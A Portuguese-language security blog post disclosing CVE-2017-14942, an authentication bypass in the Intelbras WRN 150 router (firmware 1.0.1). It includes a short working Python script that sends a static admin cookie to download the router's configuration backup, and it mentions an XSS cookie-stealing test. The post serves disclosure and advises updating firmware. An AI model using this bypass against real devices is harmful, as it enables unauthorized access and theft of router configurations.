FireShell Security Team
Home Team Articles Sponsors About

[CVE-2017-14942] Autentication Bypass - INTELBRAS WRN 150 - [PT-BR]

CVE-2017-14942

Exploit

Start:

Recentemente postei um tópico onde explico uma vulnerabilidade que encontrei num dos roteadores da Intelbras “O que você tem contra a Intelbras?” Nada, se eu não gostasse deles eu não estaria usando os roteadores deles, sou apenas alguém curioso e que gosta de escrever :v.

A vulnerabilidade:

Após tentar aplicar o mesmo ataque xss no outro roteador (Intelbras WRN 150), adicionei no código uma função que me enviaria os cookies do painel do router, no primeiro teste funcionou, na segunda tentativa quando testei só para confirmar o script, também obtive êxito, foi ai que notei aquele pequeno cookie nos Headers que parecia ser o único utilizado para autenticação. A cada vez que alterava a senha ele permanecia ali.

Passo 1

Agora faremos uma requisição na página "http://10.0.0.1/advance.asp" com o cookie normal

Passo 2

ele identifica o usuário não autenticado e retorna para a página de login.

Agora faremos a mesma requisição, alterando o cookie do painel.

Passo 3

Resultado:

Passo 4

Podemos baixar o arquivo de configurações através do link de backup, fiz um pequeno script para demonstrar

#pip install requests
from requests import get

url = "http://10.0.0.1/cgi-bin/DownloadCfg/RouterCfm.cfg"
#url do backup
header = {'Cookie': 'admin:language=pt'}
#setando o cookie no header
r = get(url, headers=header).text
print(r);

Passo 5

Prevenção

Vulnerabilidade na versão de firmware 1.0.1, baixei uma versão recente e a vulnerabilidade foi corrigida Para se proteger basta somente baixar a nova firmware disponibilizada pela Intelbras e atualizar o seu router.

© 2017 - 2018 FireShell Security Team. All rights reserved.